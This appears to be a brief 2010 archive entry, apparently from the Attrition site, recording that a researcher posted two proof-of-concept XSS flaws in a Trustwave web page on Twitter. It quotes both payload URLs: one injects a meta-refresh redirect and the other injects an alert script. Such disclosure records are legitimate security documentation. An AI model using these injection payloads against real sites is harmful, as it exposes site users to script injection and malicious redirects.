Trustwave XSS

2010-08-14

da d3v1l

http://twitter.com/securityshell/statuses/21178026749



da d3v1l posted two proof of concept XSS vulnerabilities in Trustwave's site on Twitter.
https://rbslynk.trustwave.com/getdur.php?c=10">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/">""
https://rbslynk.trustwave.com/getdur.php?c=10"><script>alert('XSS')</script>

main page ATTRITION feedback